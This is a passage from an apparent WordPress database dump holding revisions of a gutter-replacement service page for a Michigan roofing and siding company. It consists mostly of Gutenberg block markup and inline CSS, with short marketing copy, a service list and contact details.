{\"contentWidth\":\"full_width\",\"blockId\":\"db3fc478-1e17-4b3a-a716-13344f9e6690\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-db3fc478-1e17-4b3a-a716-13344f9e6690 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-db3fc478-1e17-4b3a-a716-13344f9e6690.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-db3fc478-1e17-4b3a-a716-13344f9e6690.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-db3fc478-1e17-4b3a-a716-13344f9e6690.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"ca193fef-40c6-45db-9cb5-bd651dcaeacc\"} -->\n<style type=\"text/css\"> .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-ca193fef-40c6-45db-9cb5-bd651dcaeacc skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"cf17220e-f4d6-4ae6-916b-7443f7483c2f\"} -->\n<style type=\"text/css\"> .block-cf17220e-f4d6-4ae6-916b-7443f7483c2f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-cf17220e-f4d6-4ae6-916b-7443f7483c2f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-cf17220e-f4d6-4ae6-916b-7443f7483c2f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-cf17220e-f4d6-4ae6-916b-7443f7483c2f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-cf17220e-f4d6-4ae6-916b-7443f7483c2f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-cf17220e-f4d6-4ae6-916b-7443f7483c2f\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"0cb880bb-8643-4209-a6cc-115212c50ad3\"} -->\n<style type=\"text/css\"> .block-0cb880bb-8643-4209-a6cc-115212c50ad3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0cb880bb-8643-4209-a6cc-115212c50ad3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0cb880bb-8643-4209-a6cc-115212c50ad3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0cb880bb-8643-4209-a6cc-115212c50ad3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0cb880bb-8643-4209-a6cc-115212c50ad3 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0cb880bb-8643-4209-a6cc-115212c50ad3\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"01f0da2e-d4f9-4e36-9a52-97c027439fab\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-01f0da2e-d4f9-4e36-9a52-97c027439fab\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Gutter Replacement </h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:heading {\"level\":1} -->\n<h1 id=\"headline\">In need of gutter replacement in Saginaw? Our gutter replacement specialists are ready to help. Why<strong> Us?</strong></h1>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li><strong>Professional Service</strong></li><li><strong>Gutter Replacement</strong></li><li><strong>Gutter Installation</strong></li><li><strong>All Types of Gutters</strong></li><li><strong>All Material Types</strong></li><li><strong>Downspout Services</strong></li><li><strong>Gutter Covers &amp; Leaf Guards</strong></li><li><strong>High Customer Satisfaction</strong></li><li><strong>Residential and Commercial Service</strong></li></ul>\n<!-- /wp:list -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"35f3b882-a96a-4182-be6f-1c6bdb4d72e1\"} -->\n<style type=\"text/css\"> .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"264037b9-5df4-468c-811d-8b3c0b40d53c\"} -->\n<style type=\"text/css\"> .block-264037b9-5df4-468c-811d-8b3c0b40d53c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-264037b9-5df4-468c-811d-8b3c0b40d53c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-264037b9-5df4-468c-811d-8b3c0b40d53c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-264037b9-5df4-468c-811d-8b3c0b40d53c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-264037b9-5df4-468c-811d-8b3c0b40d53c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-264037b9-5df4-468c-811d-8b3c0b40d53c\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"e7c79c75-dbee-4db9-a78e-ab428612139b\"} -->\n<style type=\"text/css\"> .block-id-e7c79c75-dbee-4db9-a78e-ab428612139b .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-e7c79c75-dbee-4db9-a78e-ab428612139b .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-e7c79c75-dbee-4db9-a78e-ab428612139b .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-e7c79c75-dbee-4db9-a78e-ab428612139b is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph -->\n<p>You’re one step away from connecting with a specialist who can complete your Gutter Replacement project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li>Submit one easy form.</li><li>Connect with a local specialist.</li><li>Get a quick quote.</li><li>Enjoy your completed home project.</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Dunrite Roofing And Siding Based in Northern Oakland County We have served Northern Oakland County and the surrounding areas for over 25 years. Quality workmanship and competitive pricing have led us to become a top choice when it comes to roofing and siding in southeastern Michigan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Call (248) 393-5000</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Fill out our contact form <a href=\"https://cteisys.com/contact-layout-1/\">here.</a> We will get back with you soon.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Gutters','','inherit','closed','closed','','229-revision-v1','','','2022-08-23 18:22:23','2022-08-23 18:22:23','',229,'https://cteisys.com/?p=430',0,'revision','',0),(429,1,'2022-08-23 18:20:47','2022-08-23 18:20:47','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"db3fc478-1e17-4b3a-a716-13344f9e6690\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-db3fc478-1e17-4b3a-a716-13344f9e6690 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-db3fc478-1e17-4b3a-a716-13344f9e6690.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-db3fc478-1e17-4b3a-a716-13344f9e6690.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-db3fc478-1e17-4b3a-a716-13344f9e6690.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"ca193fef-40c6-45db-9cb5-bd651dcaeacc\"} -->\n<style type=\"text/css\"> .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-ca193fef-40c6-45db-9cb5-bd651dcaeacc skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"cf17220e-f4d6-4ae6-916b-7443f7483c2f\"} -->\n<style type=\"text/css\"> .block-cf17220e-f4d6-4ae6-916b-7443f7483c2f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-cf17220e-f4d6-4ae6-916b-7443f7483c2f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-cf17220e-f4d6-4ae6-916b-7443f7483c2f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-cf17220e-f4d6-4ae6-916b-7443f7483c2f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-cf17220e-f4d6-4ae6-916b-7443f7483c2f .skt-blocks-block-column{\n padding-top: undefinedpx; 